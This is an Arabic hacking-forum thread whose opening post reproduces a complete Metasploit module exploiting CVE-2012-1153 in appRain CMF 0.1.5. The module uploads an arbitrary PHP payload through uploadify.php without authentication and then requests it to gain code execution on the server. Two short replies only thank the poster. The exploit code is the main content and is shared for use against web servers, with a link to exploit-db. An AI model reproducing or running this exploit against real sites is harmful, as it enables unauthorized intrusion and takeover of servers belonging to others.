ثغرة جديده { appRain CMF Arbitrary PHP File Upload Vulnerability }

ثغرة جديده { appRain CMF Arbitrary PHP File Upload Vulnerability }


النتائج 1 إلى 3 من 3

الموضوع: ثغرة جديده { appRain CMF Arbitrary PHP File Upload Vulnerability }

  1. #1

    Gadid ثغرة جديده { appRain CMF Arbitrary PHP File Upload Vulnerability }

    بسم الله الرحمن الرحيم





    كود PHP:
      ##
    # This file is part of the Metasploit Framework and may be subject to
    # redistribution and commercial restrictions. Please see the Metasploit
    # Framework web site for more information on licensing and terms of use.
    #   http://metasploit.com/framework/
    ##
     
    require 'msf/core'
     
    class Metasploit3 < Msf::Exploit::Remote
        Rank = ExcellentRanking
     
        include Msf::Exploit::Remote::HttpClient
     
        def initialize(info={})
            super(update_info(info,
                'Name'           => "appRain CMF Arbitrary PHP File Upload Vulnerability",
                'Description'    => %q{
                        This module exploits a vulnerability found in appRain's Content Management
                    Framework (CMF), version 0.1.5 or less.  By abusing the uploadify.php file, a
                    malicious user can upload a file to the uploads/ directory without any
                    authentication, which results in arbitrary code execution.
                },
                'License'        => MSF_LICENSE,
                'Author'         =>
                    [
                        'EgiX',   #Discovery, PoC
                        'sinn3r'  #Metasploit
                    ],
                'References'     =>
                    [
                        ['CVE', '2012-1153'],
                        ['OSVDB', '78473'],
                        ['EDB', '18392']
                    ],
                'Payload'        =>
                    {
                        'BadChars' => "\x00"
                    },
                'DefaultOptions'  =>
                    {
                        'ExitFunction' => "none"
                    },
                'Platform'       => ['php'],
                'Arch'           => ARCH_PHP,
                'Targets'        =>
                    [
                        ['appRain 0.1.5 or less', {}]
                    ],
                'Privileged'     => false,
                'DisclosureDate' => "Jan 19 2012",
                'DefaultTarget'  => 0))
     
                register_options(
                    [
                        OptString.new('TARGETURI', [true, 'The base path to appRain', '/appRain-q-0.1.5'])
                    ], self.class)
        end
     
        def check
            uri = target_uri.path
            uri << '/' if uri[-1,1] != '/'
     
            res = send_request_cgi({
                'method' => 'GET',
                'uri'    => "#{uri}addons/uploadify/uploadify.php"
            })
     
            if res and res.code == 200 and res.body.empty?
                return Exploit::CheckCode::Detected
            else
                return Exploit::CheckCode::Safe
            end
        end
     
        def exploit
            uri = target_uri.path
            uri << '/' if uri[-1,1] != '/'
     
            peer = "#{rhost}:#{rport}"
            payload_name = Rex::Text.rand_text_alpha(rand(10) + 5) + '.php'
     
            post_data = "--o0oOo0o\r\n"
            post_data << "Content-Disposition: form-data; name=\"Filedata\"; filename=\"#{payload_name}\"\r\n\r\n"
            post_data << "<?php "
            post_data << payload.encoded
            post_data << " 
    ?>\r\n"
            post_data << "--o0oOo0o\r\n"
     
            print_status("#{peer} - Sending PHP payload (#{payload_name})")
            res = send_request_cgi({
                'method' => 'POST',
                'uri'    => "#{uri}addons/uploadify/uploadify.php",
                'ctype'  => 'multipart/form-data; boundary=o0oOo0o',
                'data'   => post_data
            })
     
            # If the server returns 200 and the body contains our payload name,
            # we assume we uploaded the malicious file successfully
            if not res or res.code != 200 or res.body !~ /#{payload_name}/
                print_error("#{peer} - I don't think the file was uploaded. Abort!")
                return
            end
     
            print_status("#{peer} - Executing PHP payload (#{payload_name})")
            # Execute our payload
            res = send_request_cgi({
                'method' => 'GET',
                'uri'    => "#{uri}addons/uploadify/uploads/#{payload_name}"
            })
     
            # If we don't get a 200 when we request our malicious payload, we suspect
            # we don't have a shell, either.  Print the status code for debugging purposes.
            if res and res.code != 200
                print_status("#{peer} - Server returns #{res.code.to_s}")
            end
        end
    end


    رآبط الثغره : http://www.exploit-db.com/exploits/18922



    تحياتي

  2. #2
    :: مشرف قسم الباك تراك :: الصورة الرمزية يارب رحمتك
    تاريخ التسجيل
    May 2012
    الدولة
    روح العرب
    المشاركات
    1,147

    افتراضي رد: ثغرة جديده { appRain CMF Arbitrary PHP File Upload Vulnerability }

    يشرفنى ان اكون اول من يرد على مواضيعك المميزة ...
    واسال الله ان يرزقنا حسن الخاتمة ايانا واياك ...
    بآلتوفيق عزيزى ...


    youtube

    [ما يلفظ من قول الا لديه رقيب عتيد]
    [ آفعل مآ شئت فكمآ تديُن تدآن ]

    hacker ▎security ▎no Breach>>
    [ mohamed -kareb ]


  3. #3

    افتراضي رد: ثغرة جديده { appRain CMF Arbitrary PHP File Upload Vulnerability }


    الشرف لي يا رب رحمتكـ
    تسلم على مروركـ
    ونسئل الله حسن الخاتمه

    تحساتي

المواضيع المتشابهه

  1. اريد شرح استخدام ثغرة ISC Bind Security وثغرة CGI Scripts : PHPBB Arbitrary File Disc
    بواسطة bestman في المنتدى قسم المشاكل والإستفسارات
    مشاركات: 0
    آخر مشاركة: 04-28-2012, 02:05 PM
  2. ثغرة upload جديده شرح بالفديو من البحث إلي رفع الإندكس..في أقل من 3 دقايق.. والله جد.
    بواسطة black_dream في المنتدى اختراق المواقع والسيرفرات
    مشاركات: 9
    آخر مشاركة: 09-27-2011, 12:28 AM
  3. شرح ثغرة Local File Inclusion Vulnerability
    بواسطة شيخ الهكرز في المنتدى اختراق المواقع والسيرفرات
    مشاركات: 2
    آخر مشاركة: 01-23-2011, 02:39 PM
  4. ثغرة ابلود جديدة PHP File Uploader Shell Upload
    بواسطة فهد كوم في المنتدى قسم الثغرات
    مشاركات: 6
    آخر مشاركة: 10-19-2010, 09:56 PM
  5. الدرس الخامس (دينامكية عمل ثغرة Remote Upload Vulnerability)
    بواسطة ASDELY-ScOrPiOn في المنتدى اختراق المواقع والسيرفرات
    مشاركات: 1
    آخر مشاركة: 07-22-2009, 04:24 AM

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •